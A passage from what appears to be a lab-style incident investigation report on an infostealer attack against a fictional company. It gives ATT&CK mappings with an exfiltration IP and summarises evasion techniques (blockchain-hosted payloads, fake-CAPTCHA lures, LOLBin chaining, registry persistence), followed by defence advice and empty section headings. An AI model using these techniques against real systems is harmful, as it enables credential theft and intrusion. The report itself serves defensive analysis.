Exfiltration	Exfiltration Over C2 Channel	T1041	Data uploaded to 145.1.0.92
Exfiltration	Encrypted Channel	T1573	HTTPS used for exfiltration

Key Takeaways#

Novel Techniques Observed:#

Blockchain-Based Payload Delivery:
- First observed use of smart contracts for payload storage
- Difficult to takedown (decentralized)
- No malicious content on phishing page itself
- Evades traditional web filtering
Fake CAPTCHA Social Engineering:
- Highly effective user manipulation
- Leverages user trust in CAPTCHA systems
- Tricks users into executing malicious commands
- Bypasses all technical controls
LOLBin Chaining:
- mshta.exe IMEWDBLD.EXE chain
- All binaries are Microsoft-signed
- No traditional malware signatures
- Evades most AV/EDR solutions
Registry-Based Persistence:
- File association hijacking for execution
- Subtle and often overlooked
- Allows arbitrary file execution
- Persists across reboots

Defense Recommendations:#

People:

Security awareness is critical
Technical controls alone are insufficient
Regular training and testing required

Process:

Incident response plan must cover novel attacks
Threat hunting should be proactive
Regular security assessments needed

Technology:

Defense in depth is essential
Behavioral detection over signature-based
Network segmentation limits impact
MFA must be mandatory

Conclusion#

This investigation successfully reconstructed a sophisticated multi-stage cyber attack against The Etherians (Megacorp One). The threat actor demonstrated advanced capabilities including:

Social Engineering Mastery: Fake CAPTCHA technique
Technical Innovation: Blockchain payload delivery
Operational Security: LOLBin usage, encrypted exfiltration
Strategic Targeting: Cloud administrator credentials

Final Status:

All 7 investigation objectives achieved
Complete attack chain documented
All IoCs extracted and cataloged
Compromised credentials identified
Recommendations provided

Case Status: CLOSED - Complete Analysis

Report Prepared By: MR. Umair
Date: October 15, 2025
Classification: INTERNAL USE ONLY
Distribution: Security Team, Management, IT Department

Investigation Report#

Stealer’s Shadow - Security Incident Investigation Report#

Executive Summary#

Detailed Investigation Findings#

1 Exfiltrated Files and Malware Identification#

Answer:#

Evidence:#

Impact Assessment:#

2 Malware Download and Execution Mechanism#

Answer:#

Technical Evidence:#

ATT&CK Framework Mapping:#

3 Complete Attack Chain Reconstruction#

Answer:#

Full Kill Chain Analysis#

Phase 1: Initial Reconnaissance & Weaponization#

Phase 2: Initial Access - Phishing Campaign#

Phase 3: Redirection & Social Engineering#

Phase 4: Blockchain-Based Payload Retrieval#

Phase 5: User-Initiated Execution (Social Engineering Success)#

Phase 6: HTA Payload Execution & LOLBin Abuse#

Phase 7: Malware Execution & C2 Establishment#

Phase 8: Data Collection & Exfiltration#

Attack Chain Summary Diagram#

Complete IoC Timeline#

4 Command & Control Infrastructure Analysis#

Answer:#

Endpoint 1: /life#

Endpoint 2: /send_message#

Endpoint 3: /receive_message#

Endpoint 4: /feed#

C2 Communication Pattern:#

5 Encryption and Data Protection Analysis#

Answer:#

Password Structure Analysis#

Security Assessment:#

6 Compromised Credentials Discovery#

Answer:#

Account 1: Microsoft Azure Portal#

Account 2: Google Workspace#

Impact Analysis:#

7 Attacker Infrastructure Mapping#

Answer:#

Infrastructure Relationship Map:#

WHOIS & Threat Intelligence (Hypothetical):#

Security Control Failures#

Controls That Failed:#

Recommended Actions#

Immediate (0-24 hours):#

Short-term (1-7 days):#

Long-term (1-3 months):#

MITRE ATT&CK Mapping#

Key Takeaways#

Novel Techniques Observed:#

Defense Recommendations:#

Conclusion#

Endpoint 1: `/life`#

Endpoint 2: `/send_message`#

Endpoint 3: `/receive_message`#

Endpoint 4: `/feed`#